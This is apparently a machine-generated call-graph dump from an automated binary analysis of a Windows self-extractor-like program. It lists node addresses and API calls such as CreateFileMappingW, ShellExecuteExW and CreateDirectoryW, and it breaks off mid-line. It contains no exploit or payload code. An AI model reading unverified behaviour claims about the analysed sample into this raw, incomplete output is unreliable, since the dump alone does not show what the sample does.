18763->18765 18767 c8c531 18763->18767 18768 c8c813 18763->18768 18775 c8c559 18765->18775 18769 c8c5a1 __dosmaperr 5 API calls 18768->18769 18770 c8c83a 18769->18770 18771 c8c858 InitializeCriticalSectionAndSpinCount 18770->18771 18774 c8c843 18770->18774 18771->18774 18772 c82495 CatchGuardHandler 5 API calls 18773 c8c86f 18772->18773 18773->18763 18774->18772 18776 c8c585 18775->18776 18777 c8c566 18775->18777 18776->18767 18778 c8c570 DeleteCriticalSection 18777->18778 18778->18776 18778->18778 19654 c7ea13 19655 c7ea1d __EH_prolog 19654->19655 19816 c71180 19655->19816 19658 c7f0f4 19875 c80782 19658->19875 19659 c7ea5f 19661 c7ead5 19659->19661 19662 c7ea6c 19659->19662 19691 c7ea4b 19659->19691 19664 c7eb74 GetDlgItemTextW 19661->19664 19669 c7eaef 19661->19669 19665 c7ea71 19662->19665 19666 c7eaa8 19662->19666 19664->19666 19672 c7ebab 19664->19672 19675 c73fb9 54 API calls 19665->19675 19665->19691 19676 c7eac9 EndDialog 19666->19676 19666->19691 19667 c7f112 SendMessageW 19668 c7f120 19667->19668 19670 c7f13a GetDlgItem SendMessageW 19668->19670 19671 c7f129 SendDlgItemMessageW 19668->19671 19674 c73fb9 54 API calls 19669->19674 19893 c7dac4 GetCurrentDirectoryW 19670->19893 19671->19670 19673 c7ebc3 GetDlgItem 19672->19673 19814 c7ebb4 19672->19814 19679 c7ebd7 SendMessageW SendMessageW 19673->19679 19680 c7ebfd SetFocus 19673->19680 19681 c7eb11 SetDlgItemTextW 19674->19681 19682 c7ea8b 19675->19682 19676->19691 19678 c7f16c GetDlgItem 19683 c7f185 19678->19683 19684 c7f18b SetWindowTextW 19678->19684 19679->19680 19686 c7ec0d 19680->19686 19699 c7ec19 19680->19699 19685 c7eb1f 19681->19685 19918 c710c0 SHGetMalloc 19682->19918 19683->19684 19894 c7defe GetClassNameW 19684->19894 19685->19691 19694 c7eb2c GetMessageW 19685->19694 19708 c7eb52 TranslateMessage DispatchMessageW 19685->19708 19689 c73fb9 54 API calls 19686->19689 19695 c7ec17 19689->19695 19692 c7f094 19697 c73fb9 54 API calls 19692->19697 19694->19685 19694->19691 19701 c805d4 11 API calls 19695->19701 19696 c7ea96 SetDlgItemTextW 19696->19691 19700 c7f0a4 SetDlgItemTextW 19697->19700 19705 c73fb9 54 API calls 19699->19705 19703 c7f0b8 19700->19703 19704 c7ec6e 19701->19704 19706 c73fb9 54 API calls 19703->19706 19826 c722b9 19704->19826 19709 c7ec4b 19705->19709 19711 c7f0e1 19706->19711 19707 c7f1d6 19714 c7f206 19707->19714 19717 c73fb9 54 API calls 19707->19717 19708->19685 19710 c736d0 _swprintf 51 API calls 19709->19710 19710->19695 19715 c73fb9 54 API calls 19711->19715 19713 c7f90b 91 API calls 19713->19707 19718 c7f90b 91 API calls 19714->19718 19750 c7f2be 19714->19750 19715->19691 19722 c7f1e9 SetDlgItemTextW 19717->19722 19723 c7f221 19718->19723 19719 c7f36e 19724 c7f377 EnableWindow 19719->19724 19725 c7f380 19719->19725 19720 c7ecaa 19832 c7df59 SetCurrentDirectoryW 19720->19832 19721 c7eca3 GetLastError 19721->19720 19727 c73fb9 54 API calls 19722->19727 19734 c7f233 19723->19734 19751 c7f258 19723->19751 19724->19725 19729 c7f39d 19725->19729 19938 c7113d GetDlgItem KiUserCallbackDispatcher 19725->19938 19728 c7f1fd SetDlgItemTextW 19727->19728 19728->19714 19731 c7f3c4 19729->19731 19740 c7f3bc SendMessageW 19729->19740 19730 c7ecc0 19732 c7ecd3 19730->19732 19733 c7ecc9 GetLastError 19730->19733 19731->19691 19742 c73fb9 54 API calls 19731->19742 19741 c7ed4e 19732->19741 19746 c7ed5e 19732->19746 19747 c7eceb GetTickCount 19732->19747 19733->19732 19927 c7d4d2 ShowWindow 19734->19927 19735 c7f2b1 19737 c7f90b 91 API calls 19735->19737 19737->19750 19739 c7f393 19939 c7113d GetDlgItem KiUserCallbackDispatcher 19739->19939 19740->19731 19745 c7ef97 19741->19745 19741->19746 19749 c7f3dd SetDlgItemTextW 19742->19749 19743 c7f24c 19743->19751 19841 c7115b GetDlgItem ShowWindow 19745->19841 19753 c7ed76 GetModuleFileNameW 19746->19753 19754 c7ef32 19746->19754 19755 c736d0 _swprintf 51 API calls 19747->19755 19748 c7f34c 19756 c7d4d2 6 API calls 19748->19756 19749->19691 19750->19719 19750->19748 19757 c73fb9 54 API calls 19750->19757 19751->19735 19758 c7f90b 91 API calls 19751->19758 19920 c74c08 19753->19920 19754->19666 19766 c73fb9 54 API calls 19754->19766 19761 c7ed08 19755->19761 19762 c7f36b 19756->19762 19757->19750 19763 c7f286 19758->19763 19759 c7efa7 19842 c7115b GetDlgItem ShowWindow 19759->19842 19833 c71b41 19761->19833 19762->19719 19763->19735 19767 c7f28f DialogBoxParamW 19763->19767 19770 c7ef46 19766->19770 19767->19666 19767->19735 19768 c7efb1 19771 c73fb9 54 API calls 19768->19771 19769 c736d0 _swprintf 51 API calls 19772 c7edc2 CreateFileMappingW 19769->19772 19773 c736d0 _swprintf 51 API calls 19770->19773 19775 c7efbb SetDlgItemTextW 19771->19775 19776 c7ee24 GetCommandLineW 19772->19776 19810 c7eea1 __vswprintf_c_l 19772->19810 19777 c7ef64 19773->19777 19843 c7115b GetDlgItem ShowWindow 19775->19843 19781 c7ee35 19776->19781 19789 c73fb9 54 API calls 19777->19789 19778 c7ed2e 19782 c7ed35 GetLastError 19778->19782 19783 c7ed3c 19778->19783 19780 c7eeac ShellExecuteExW 19795 c7eec9 19780->19795 19924 c7e6a8 SHGetMalloc 19781->19924 19782->19783 19786 c71a43 72 API calls 19783->19786 19784 c7efcf SetDlgItemTextW GetDlgItem 19787 c7f000 19784->19787 19788 c7efe8 GetWindowLongW SetWindowLongW 19784->19788 19786->19741 19844 c7f90b 19787->19844 19788->19787 19789->19666 19792 c7e6a8 SHGetMalloc 19793 c7ee5d 19792->19793 19796 c7e6a8 SHGetMalloc 19793->19796 19798 c7ef0c 19795->19798 19799 c7eede WaitForInputIdle 19795->19799 19800 c7ee69 19796->19800 19797 c7f90b 91 API calls 19801 c7f01c 19797->19801 19798->19754 19804 c7ef22 UnmapViewOfFile CloseHandle 19798->19804 19802 c7eef3 19799->19802 19803 c74d6a 72 API calls 19800->19803 19869 c80b3e 19801->19869 19802->19798 19806 c7eef8 Sleep 19802->19806 19808 c7ee80 MapViewOfFile 19803->19808 19804->19754 19806->19798 19806->19802 19808->19810 19809 c7f90b 91 API calls 19813 c7f042 19809->19813 19810->19780 19811 c7f06b 19926 c7113d GetDlgItem KiUserCallbackDispatcher 19811->19926 19813->19811 19815 c7f90b 91 API calls 19813->19815 19814->19666 19814->19692 19815->19811 19817 c711e2 19816->19817 19818 c71189 19816->19818 19958 c73d24 19817->19958 19820 c711ef 19818->19820 19940 c73d4b 19818->19940 19820->19658 19820->19659 19820->19691 19823 c711be GetDlgItem 19823->19820 19824 c711ce 19823->19824 19824->19820 19825 c711d4 SetWindowTextW 19824->19825 19825->19820 19827 c722c3 19826->19827 19828 c72354 19827->19828 19830 c7237d 19827->19830 19964 c72480 19827->19964 19829 c72480 9 API calls 19828->19829 19828->19830 19829->19830 19830->19720 19830->19721 19832->19730 19834 c71b4b 19833->19834 19835 c71bb5 CreateFileW 19834->19835 19836 c71ba9 19834->19836 19835->19836 19837 c71c07 19836->19837 19838 c73283 2 API calls 19836->19838 19837->19778 19839 c71bee 19838->19839 19839->19837 19840 c71bf2 CreateFileW 19839->19840 19840->19837 19841->19759 19842->19768 19843->19784 19845 c7f915 __EH_prolog 19844->19845 19846 c7f00e 19845->19846 19996 c7e5b0 19845->19996 19846->19797 19849 c7e5b0 ExpandEnvironmentStringsW 19854 c7f94c _wcsrchr 19849->19854 19850 c7fc4c SetWindowTextW 19850->19854 19854->19846 19854->19849 19854->19850 19867 c7fa30 ___scrt_fastfail 19854->19867 20000 c76fa3 CompareStringW 19854->20000 20001 c7dac4 GetCurrentDirectoryW 19854->20001 20002 c727a3 19854->20002 20011 c7272c 19854->20011 20014 c7e708 19854->20014 19855 c7fa3d SetFileAttributesW 19857 c7faf8 GetFileAttributesW 19855->19857 19855->19867 19859 c7fb06 DeleteFileW 19857->19859 19857->19867 19859->19867 19860 c7fe16 GetDlgItem SetWindowTextW SendMessageW 19860->19867 19861 c727a3 7 API calls 19861->19867 19862 c736d0 _swprintf 51 API calls 19864 c7fb3b GetFileAttributesW 19862->19864 19863 c7fe58 SendMessageW 19863->19854 19865 c7fb4c MoveFileW 19864->19865 19864->19867 19866 c7fb64 MoveFileExW 19865->19866 19865->19867 19866->19867 19867->19854 19867->19855 19867->19860 19867->19861 19867->19862 19867->19863 19868 c7fad4 SHFileOperationW 19867->19868 20006 c731a0 19867->20006 19868->19857 19870 c80b48 __EH_prolog 19869->19870 20029 c75d36 19870->20029 19872 c80b6f 19873 c7f02d 19872->19873 20033 c7c79c 19872->20033 19873->19809 19876 c8078f 19875->19876 19877 c7d9f6 6 API calls 19876->19877 19878 c80794 19877->19878 19879 c8079c GetWindow 19878->19879 19882 c7f0fa 19878->19882 19880 c807b8 19879->19880 19879->19882 19881 c807c5 GetClassNameW 19880->19881 19880->19882 19884 c807ed GetWindowLongW 19880->19884 19885 c8084e GetWindow 19880->19885 20596 c76fa3 CompareStringW 19881->20596 19882->19667 19882->19668 19884->19885 19886 c807fd SendMessageW 19884->19886 19885->19880 19885->19882 19886->19885 19887 c80813 GetObjectW 19886->19887 19888 c7da58 3 API calls 19887->19888 19889 c80828 19888->19889 19890 c7da15 3 API calls 19889->19890 19891 c7dc29 8 API calls 19889->19891 19890->19889 19892 c80838 SendMessageW DeleteObject 19891->19892 19892->19885 19893->19678 19895 c7df44 19894->19895 19896 c7df1f 19894->19896 19900 c7e2f9 19895->19900 20597 c76fa3 CompareStringW 19896->20597 19898 c7df32 19898->19895 19899 c7df36 FindWindowExW 19898->19899 19899->19895 19901 c7e303 __EH_prolog 19900->19901 19902 c71d7b 6 API calls 19901->19902 19904 c7e32f ___std_exception_copy 19902->19904 19903 c71a43 72 API calls 19905 c7e441 19903->19905 19906 c71ff0 70 API calls 19904->19906 19915 c7e3db 19904->19915 19905->19707 19905->19713 19907 c7e35c 19906->19907 19908 c720fb 70 API calls 19907->19908 19909 c7e367 19908->19909 19910 c71ff0 70 API calls 19909->19910 19911 c7e388 19910->19911 19912 c71f1d 73 API calls 19911->19912 19913 c7e395 19912->19913 19914 c71af3 68 API calls 19913->19914 19916 c7e3a3 ___std_exception_copy 19914->19916 19915->19903 19916->19915 19917 c76b87 MultiByteToWideChar 19916->19917 19917->19915 19919 c710d7 19918->19919 19919->19691 19919->19696 19921 c74c2a 19920->19921 19922 c74c11 19920->19922 19921->19769 19922->19921 19923 c74c7f 72 API calls 19922->19923 19923->19921 19925 c7e6ca 19924->19925 19925->19792 19926->19814 20598 c7d23f 19927->20598 19930 c7d524 19931 c7d5be 19930->19931 19933 c7d586 19930->19933 19932 c7d5c2 ShowWindow 19931->19932 19937 c7d5bb 19931->19937 19932->19937 19933->19937 20600 c7d2f5 19933->20600 19936 c7d5a4 ShowWindow SetWindowTextW 19936->19937 19937->19743 19938->19739 19939->19729 19961 c73702 19940->19961 19942 c73d71 GetWindowRect GetClientRect 19943 c73e66 19942->19943 19944 c73dcb 19942->19944 19945 c73e70 GetWindowTextW 19943->19945 19946 c73ea8 GetSystemMetrics GetWindow 19943->19946 19944->19946 19951 c73e2c GetWindowLongW 19944->19951 19947 c73793 52 API calls 19945->19947 19949 c73ec8 19946->19949 19950 c73e9c SetWindowTextW 19947->19950 19948 c711ab 19948->19820 19948->19823 19949->19948 19952 c73ed4 GetWindowTextW 19949->19952 19954 c73793 52 API calls 19949->19954 19955 c73f8f GetWindow 19949->19955 19956 c73f1a GetWindowRect 19949->19956 19950->19946 19953 c73e56 GetWindowRect 19951->19953 19952->19949 19953->19943 19957 c73f07 SetWindowTextW 19954->19957 19955->19948 19955->19949 19956->19955 19957->19949 19959 c73d2a GetWindowLongW SetWindowLongW 19958->19959 19960 c73d48 19958->19960 19959->19960 19960->19820 19962 c73793 52 API calls 19961->19962 19963 c7372a _wcschr 19962->19963 19963->19942 19965 c7248d 19964->19965 19966 c724b1 19965->19966 19967 c724a4 CreateDirectoryW 19965->19967 19985 c723ea 19966->19985 19967->19966 19969 c724e4 19967->19969 19974 c724f3 19969->19974 19977 c726bd 19969->19977 19971 c724f7 GetLastError 19971->19974 19972 c73283 2 API calls 19975 c724cd 19972->19975 19974->19827 19975->19971 19976 c724d1 CreateDirectoryW 19975->19976 19976->19969 19976->19971 19978 c81bc0 19977->19978 19979 c726ca SetFileAttributesW 19978->19979 19980 c726e0 19979->19980 19981 c7270d 19979->19981 19982 c73283 2 API calls 19980->19982 19981->19974 19983 c726f4 19982->19983 19983->19981 19984 c726f8 SetFileAttributesW 19983->19984 19984->19981 19988 c723fe 19985->19988 19989 c81bc0 19988->19989 19990 c7240b GetFileAttributesW 19989->19990 19991 c723f3 19990->19991 19992 c7241c 19990->19992 19991->19971 19991->19972 19993 c73283 2 API calls 19992->19993 19994 c72430 19993->19994 19994->19991 19995 c72434 GetFileAttributesW 19994->19995 19995->19991 19997 c7e5ba 19996->19997 19998 c7e66d ExpandEnvironmentStringsW 19997->19998 19999 c7e690 19997->19999 19998->19999 19999->19854 20000->19854 20001->19854 20005 c727b1 20002->20005 20003 c72844 20003->19854 20004 c7286d 7 API calls 20004->20005 20005->20003 20005->20004 20007 c73412 CharUpperW 20006->20007 20008 c731b5 20007->20008 20009 c736d0 _swprintf 51 API calls 20008->20009 20010 c731cc _wcschr 20008->20010 20009->20010 20010->19867 20012 c72737 FindClose 20011->20012 20013 c7273e 20011->20013 20012->20013 20013->19854 20015 c7e712 ___std_exception_copy 20014->20015 20019 c7e731 20015->20019 20020 c71834 20015->20020 20017 c7e5b0 ExpandEnvironmentStringsW 20017->20019 20018 c7e7d3 20018->19854 20019->20017 20019->20018 20025 c71847 20020->20025 20022 c7183c 20023 c7194e RaiseException 20022->20023 20024 c71845 20023->20024 20024->20019 20026 c7185a 20025->20026 20027 c76682 67 API calls 20026->20027 20028 c71862 20027->20028 20028->20022 20030 c75d43 20029->20030 20037 c75c76 20030->20037 20032 c75d5b 20032->19872 20034 c7c7a6 __EH_prolog ___scrt_fastfail 20033->20034 20048 c7b9b3 20034->20048 20036 c7c7cb 20036->19873 20038 c75c8c 20037->20038 20047 c75ce7 __vswprintf_c_l 20037->20047 20039 c75cb5 20038->20039 20040 c717fc 67 API calls 20038->20040 20043 c75d14 20039->20043 20044 c75cd4 ___std_exception_copy 20039->20044 20041 c75cab 20040->20041 20042 c71834 68 API calls 20041->20042 20042->20039 20045 c71834 68 API calls 20043->20045 20043->20047 20046 c71834 68 API calls 20044->20046 20044->20047 20045->20047 20046->20047 20047->20032 20053 c7ab26 20048->20053 20050 c7b9bb 20052 c7b9c4 20050->20052 20058 c7ab76 20050->20058 20052->20036 20054 c7ab30 ___std_exception_copy 20053->20054 20055 c7ab5a 20054->20055 20056 c71847 67 API calls 20054->20056 20055->20050 20057 c7ab72 20056->20057 20057->20050 20059 c7ab80 20058->20059 20075 c7b492 20059->20075 20596->19880 20597->19898 20599 c7d27c GetWindowRect 20598->20599 20599->19930 20602 c7d307 ___std_exception_copy 20600->20602 20601 c7d4b1 20601->19936 20601->19937 20602->20601 20603 c76fc5 CompareStringW 20602->20603 20603->20602 20604 c8d81d 20605 c8d828 20604->20605 20606 c8d850 20605->20606 20607 c8d841 20605->20607 20608 c8d85f 20606->20608 20625 c90f73 20606->20625 20609 c8ac42 _free 20 API calls 20607->20609 20613 c8c080 20608->20613 20612 c8d846 ___scrt_fastfail 20609->20612 20614 c8c098 20613->20614 20615 c8c08d 20613->20615 20617 c8c0a0 20614->20617 20624 c8c0a9 _CallSETranslator 20614->20624 20616 c8a838 __onexit 21 API calls 20615->20616 20621 c8c095 20616->20621 20618 c8a7fe _free 20 API calls 20617->20618 20618->20621 20619 c8c0ae 20622 c8ac42 _free 20 API calls 20619->20622 20620 c8c0d3 HeapReAlloc 20620->20621 20620->20624 20621->20612 20622->20621 20623 c8a347 new 7 API calls 20623->20624 20624->20619 20624->20620 20624->20623 20626 c90f7e 20625->20626 20627 c90f93 HeapSize 20625->20627 20628 c8ac42 _free 20 API calls 20626->20628 20627->20608 20629 c90f83 20628->20629 20630 c8ab21 pre_c_initialization 26 API calls 20629->20630 20631 c90f8e 20630->20631 20631->20608 17858 c8b22b 17866 c8c6b8 17858->17866 17863 c8b254 17865 c8b23f 17896 c8c5a1 17866->17896 17869 c8c6f7 TlsAlloc 17872 c8c6e8 17869->17872 17870 c82495 CatchGuardHandler 5 API calls 17871 c8b235 17870->17871 17871->17865 17873 c8b1a6 GetLastError 17871->17873 17872->17870 17874 c8b1c5 17873->17874 17875 c8b1bf 17873->17875 17879 c8b21c SetLastError 17874->17879 17917 c8a8c9 17874->17917 17910 c8c764 17875->17910 17878 c8b1d7 17880 c8b1df 17878->17880 17930 c8c7ba 17878->17930 17882 c8b225 17879->17882 17924 c8a7fe 17880->17924 17882->17863 17892 c8b257 17882->17892 17885 c8b1e5 17887 c8b213 SetLastError 17885->17887 17886 c8b1fb 17937 c8af94 17886->17937 17887->17882 17890 c8a7fe _free 17 API calls 17891 c8b20c 17890->17891 17891->17879 17891->17887 17893 c8b267 17892->17893 17894 c8b261 17892->17894 17893->17865 18109 c8c70e 17894->18109 17900 c8c5d1 17896->17900 17901 c8c5cd 17896->17901 17897 c8c5f1 17899 c8c5fd GetProcAddress 17897->17899 17897->17900 17902 c8c60d __crt_fast_encode_pointer 17899->17902 17900->17869 17900->17872 17901->17897 17901->17900 17903 c8c63d 17901->17903 17902->17900 17904 c8c65e LoadLibraryExW 17903->17904 17908 c8c653 17903->17908 17905 c8c67b GetLastError 17904->17905 17906 c8c693 17904->17906 17905->17906 17909 c8c686 LoadLibraryExW 17905->17909 17907 c8c6aa FreeLibrary 17906->17907 17906->17908 17907->17908 17908->17901 17909->17906 17911 c8c5a1 __dosmaperr 5 API calls 17910->17911 17912 c8c78b 17911->17912 17913 c8c7a3 TlsGetValue 17912->17913 17914 c8c797 17912->17914 17913->17914 17915 c82495 CatchGuardHandler 5 API calls 17914->17915 17916 c8c7b4 17915->17916 17916->17874 17922 c8a8d6 _CallSETranslator 17917->17922 17918 c8a916 17947 c8ac42 17918->17947 17919 c8a901 HeapAlloc 17920 c8a914 17919->17920 17919->17922 17920->17878 17922->17918 17922->17919 17942 c8a347 17922->17942 17925 c8a809 RtlFreeHeap 17924->17925 17926 c8a832 _free 17924->17926 17925->17926 17927 c8a81e 17925->17927 17926->17885 17928 c8ac42 _free 18 API calls 17927->17928 17929 c8a824 GetLastError 17928->17929 17929->17926 17931 c8c5a1 __dosmaperr 5 API calls 17930->17931 17932 c8c7e1 17931->17932 17933 c8c7fc TlsSetValue 17932->17933 17934 c8c7f0 17932->17934 17933->17934 17935 c82495 CatchGuardHandler 5 API calls 17934->17935 17936 c8b1f4 17935->17936 17936->17880 17936->17886 17961 c8af6c 17937->17961 17950 c8a38b 17942->17950 17944 c8a35d 17945 c82495 CatchGuardHandler 5 API calls 17944->17945 17946 c8a387 17945->17946 17946->17922 17948 c8b1a6 __dosmaperr 20 API calls 17947->17948 17949 c8ac47 17948->17949 17949->17920 17951 c8a397 ___FrameUnwindToState 17950->17951 17956 c8c542 EnterCriticalSection 17951->17956 17953 c8a3a2 17957 c8a3d4 17953->17957 17955 c8a3c9 ___FrameUnwindToState 17955->17944 17956->17953 17960 c8c58a LeaveCriticalSection 17957->17960 17959 c8a3db 17959->17955 17960->17959 17967 c8aeac 17961->17967 17963 c8af90 17964 c8af1c 17963->17964 17978 c8adb0 17964->17978 17966 c8af40 17966->17890 17968 c8aeb8 ___FrameUnwindToState 17967->17968 17973 c8c542 EnterCriticalSection 17968->17973 17970 c8aec2 17974 c8aee8 17970->17974 17972 c8aee0 ___FrameUnwindToState 17972->17963 17973->17970 17977 c8c58a LeaveCriticalSection 17974->17977 17976 c8aef2 17976->17972 17977->17976 17979 c8adbc ___FrameUnwindToState 17978->17979 17986 c8c542 EnterCriticalSection 17979->17986 17981 c8adc6 17987 c8b0d7 17981->17987 17983 c8adde 17991 c8adf4 17983->17991 17985 c8adec ___FrameUnwindToState 17985->17966 17986->17981 17988 c8b10d __fassign 17987->17988 17989 c8b0e6 __fassign 17987->17989 17988->17983 17989->17988 17994 c8e37b 17989->17994 18108 c8c58a LeaveCriticalSection 17991->18108 17993 c8adfe 17993->17985 17996 c8e3fb 17994->17996 17999 c8e391 17994->17999 17997 c8a7fe _free 20 API calls 17996->17997 18020 c8e449 17996->18020 17998 c8e41d 17997->17998 18002 c8a7fe _free 20 API calls 17998->18002 17999->17996 18001 c8e3c4 17999->18001 18004 c8a7fe _free 20 API calls 17999->18004 18000 c8e3e6 18003 c8a7fe _free 20 API calls 18000->18003 18001->18000 18010 c8a7fe _free 20 API calls 18001->18010 18005 c8e430 18002->18005 18006 c8e3f0 18003->18006 18008 c8e3b9 18004->18008 18011 c8a7fe _free 20 API calls 18005->18011 18012 c8a7fe _free 20 API calls 18006->18012 18007 c8e4b7 18013 c8a7fe _free 20 API calls 18007->18013 18022 c8df5a 18008->18022 18009 c8e457 18009->18007 18021 c8a7fe 20 API calls _free 18009->18021 18015 c8e3db 18010->18015 18016 c8e43e 18011->18016 18012->17996 18019 c8e4bd 18013->18019 18050 c8e058 18015->18050 18018 c8a7fe _free 20 API calls 18016->18018 18018->18020 18019->17988 18062 c8e4ee 18020->18062 18021->18009 18023 c8df6b 18022->18023 18049 c8e054 18022->18049 18024 c8df7c 18023->18024 18025 c8a7fe _free 20 API calls 18023->18025 18026 c8df8e 18024->18026 18028 c8a7fe _free 20 API calls 18024->18028 18025->18024 18027 c8dfa0 18026->18027 18029 c8a7fe _free 20 API calls 18026->18029 18030 c8dfb2 18027->18030 18031 c8a7fe _free 20 API calls 18027->18031 18028->18026 18029->18027 18032 c8dfc4 18030->18032 18033 c8a7fe _free 20 API calls 18030->18033 18031->18030 18034 c8dfd6 18032->18034 18036 c8a7fe _free 20 API calls 18032->18036 18033->18032 18035 c8dfe8 18034->18035 18037 c8a7fe _free 20 API calls 18034->18037 18038 c8a7fe _free 20 API calls 18035->18038 18039 c8dffa 18035->18039 18036->18034 18037->18035 18038->18039 18040 c8a7fe _free 20 API calls 18039->18040 18041 c8e00c 18039->18041 18040->18041 18042 c8e01e 18041->18042 18044 c8a7fe _free 20 API calls 18041->18044 18043 c8e030 18042->18043 18045 c8a7fe _free 20 API calls 18042->18045 18044->18042 18045->18043 18049->18001 18051 c8e065 18050->18051 18061 c8e0bd 18050->18061 18052 c8a7fe _free 20 API calls 18051->18052 18054 c8e075 18051->18054 18052->18054 18053 c8e087 18056 c8e099 18053->18056 18057 c8a7fe _free 20 API calls 18053->18057 18054->18053 18055 c8a7fe _free 20 API calls 18054->18055 18055->18053 18058 c8e0ab 18056->18058 18059 c8a7fe _free 20 API calls 18056->18059 18057->18056 18060 c8a7fe _free 20 API calls 18058->18060 18058->18061 18059->18058 18060->18061 18061->18000 18063 c8e4fb 18062->18063 18067 c8e519 18062->18067 18063->18067 18068 c8e0fd 18063->18068 18066 c8a7fe _free 20 API calls 18066->18067 18067->18009 18069 c8e1db 18068->18069 18070 c8e10e 18068->18070 18069->18066 18104 c8e0c1 18070->18104 18073 c8e0c1 __fassign 20 API calls 18074 c8e121 18073->18074 18075 c8e0c1 __fassign 20 API calls 18074->18075 18076 c8e12c 18075->18076 18077 c8e0c1 __fassign 20 API calls 18076->18077 18078 c8e137 18077->18078 18079 c8e0c1 __fassign 20 API calls 18078->18079 18080 c8e145 18079->18080 18105 c8e0f8 18104->18105 18106 c8e0e8 18104->18106 18105->18073 18106->18105 18107 c8a7fe _free 20 API calls 18106->18107 18107->18106 18108->17993 18110 c8c5a1 __dosmaperr 5 API calls 18109->18110 18111 c8c735 18110->18111 18112 c8c74d TlsFree 18111->18112 18113 c8c741 18111->18113 18112->18113 18114 c82495 CatchGuardHandler 5 API calls 18113->18114 18115 c8c75e 18114->18115 18115->17893 18119 c80f2c 18120 c80f39 18119->18120 18127 c73fb9 18120->18127 18128 c73fe9 18127->18128 18129 c73ff2 LoadStringW 18128->18129 18130 c74008 LoadStringW 18128->18130 18129->18130 18131 c7401a 18129->18131 18130->18131 18140 c73793 18131->18140 18133 c74028 18134 c736d0 18133->18134 18150 c719e0 18134->18150 18137 c7e7e2 PeekMessageW 18138 c7e81e 18137->18138 18139 c7e7fd GetMessageW TranslateMessage DispatchMessageW 18137->18139 18139->18138 18141 c7379d 18140->18141 18142 c73811 _strlen 18141->18142 18147 c7386f _wcschr _wcsrchr 18141->18147 18148 c76dcc WideCharToMultiByte 18141->18148 18144 c76dcc WideCharToMultiByte 18142->18144 18145 c7383c _strlen 18144->18145 18146 c736d0 _swprintf 51 API calls 18145->18146 18146->18147 18147->18133 18149 c76df9 18148->18149 18149->18142 18151 c719f7 __vswprintf_c_l 18150->18151 18154 c88145 18151->18154 18157 c86e23 18154->18157 18158 c86e4b 18157->18158 18159 c86e63 18157->18159 18160 c8ac42 _free 20 API calls 18158->18160 18159->18158 18161 c86e6b 18159->18161 18162 c86e50 18160->18162 18177 c8729e 18161->18177 18174 c8ab21 18162->18174 18166 c82495 CatchGuardHandler 5 API calls 18168 c71a01 SetDlgItemTextW 18166->18168 18168->18137 18172 c86e5b 18172->18166 18205 c8aaa6 18174->18205 18176 c8ab2d 18176->18172 18178 c872bb 18177->18178 18179 c86e7b 18177->18179 18178->18179 18226 c8b122 GetLastError 18178->18226 18185 c87269 18179->18185 18181 c872dc 18247 c8b271 18181->18247 18186 c87288 __vswprintf_c_l 18185->18186 18187 c8ac42 _free 20 API calls 18186->18187 18188 c86ef3 18187->18188 18189 c874a4 18188->18189 18407 c892ec 18189->18407 18191 c874c9 18192 c8ac42 _free 20 API calls 18191->18192 18193 c874ce 18192->18193 18195 c8ab21 pre_c_initialization 26 API calls 18193->18195 18194 c86efe 18202 c87321 18194->18202 18195->18194 18196 c874b4 __vswprintf_c_l 18196->18191 18196->18194 18414 c87601 18196->18414 18421 c87a3d 18196->18421 18426 c8763b 18196->18426 18431 c87664 18196->18431 18462 c877e0 18196->18462 18203 c8a7fe _free 20 API calls 18202->18203 18204 c87331 18203->18204 18204->18172 18206 c8b1a6 __dosmaperr 20 API calls 18205->18206 18207 c8aabc 18206->18207 18208 c8aaca 18207->18208 18209 c8ab1b 18207->18209 18214 c82495 CatchGuardHandler 5 API calls 18208->18214 18216 c8ab31 IsProcessorFeaturePresent 18209->18216 18211 c8ab20 18212 c8aaa6 pre_c_initialization 26 API calls 18211->18212 18213 c8ab2d 18212->18213 18213->18176 18215 c8aaf1 18214->18215 18215->18176 18217 c8ab3c 18216->18217 18220 c8a957 18217->18220 18221 c8a973 _abort ___scrt_fastfail 18220->18221 18222 c8a99f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18221->18222 18223 c8aa70 _abort 18222->18223 18224 c82495 CatchGuardHandler 5 API calls 18223->18224 18225 c8aa8e GetCurrentProcess TerminateProcess 18224->18225 18225->18211 18227 c8b138 18226->18227 18228 c8b144 18226->18228 18230 c8c764 __dosmaperr 11 API calls 18227->18230 18229 c8a8c9 _CallSETranslator 20 API calls 18228->18229 18232 c8b150 18229->18232 18231 c8b13e 18230->18231 18231->18228 18233 c8b18d SetLastError 18231->18233 18234 c8b158 18232->18234 18235 c8c7ba __dosmaperr 11 API calls 18232->18235 18233->18181 18236 c8a7fe _free 20 API calls 18234->18236 18237 c8b16d 18235->18237 18238 c8b15e 18236->18238 18237->18234 18239 c8b174 18237->18239 18240 c8b199 SetLastError 18238->18240 18241 c8af94 __dosmaperr 20 API calls 18239->18241 18255 c8a886 18240->18255 18243 c8b17f 18241->18243 18245 c8a7fe _free 20 API calls 18243->18245 18246 c8b186 18245->18246 18246->18233 18246->18240 18248 c872f5 18247->18248 18249 c8b284 18247->18249 18251 c8b29e 18248->18251 18249->18248 18372 c8e5c8 18249->18372 18252 c8b2b1 18251->18252 18254 c8b2c6 18251->18254 18252->18254 18393 c8d3e2 18252->18393 18254->18179 18266 c8da6c 18255->18266 18258 c8a896 18260 c8a8a0 IsProcessorFeaturePresent 18258->18260 18265 c8a8be 18258->18265 18262 c8a8ab 18260->18262 18264 c8a957 _abort 8 API calls 18262->18264 18264->18265 18296 c898cf 18265->18296 18299 c8d9da 18266->18299 18269 c8dac7 18270 c8dad3 _abort 18269->18270 18271 c8b1a6 __dosmaperr 20 API calls 18270->18271 18274 c8db00 _abort 18270->18274 18277 c8dafa _abort 18270->18277 18271->18277 18272 c8db4c 18273 c8ac42 _free 20 API calls 18272->18273 18275 c8db51 18273->18275 18281 c8db78 18274->18281 18308 c8c542 EnterCriticalSection 18274->18308 18278 c8ab21 pre_c_initialization 26 API calls 18275->18278 18277->18272 18277->18274 18295 c8db2f 18277->18295 18278->18295 18282 c8dbd7 18281->18282 18285 c8dbcf 18281->18285 18292 c8dc02 18281->18292 18309 c8c58a LeaveCriticalSection 18281->18309 18282->18292 18310 c8dabe 18282->18310 18287 c898cf _abort 28 API calls 18285->18287 18287->18282 18289 c8b122 _abort 38 API calls 18293 c8dc65 18289->18293 18291 c8dabe _abort 38 API calls 18291->18292 18313 c8dc87 18292->18313 18294 c8b122 _abort 38 API calls 18293->18294 18293->18295 18294->18295 18317 c93fc9 18295->18317 18321 c8969a 18296->18321 18302 c8d980 18299->18302 18301 c8a88b 18301->18258 18301->18269 18303 c8d98c ___FrameUnwindToState 18302->18303 18304 c8c542 _abort EnterCriticalSection 18303->18304 18305 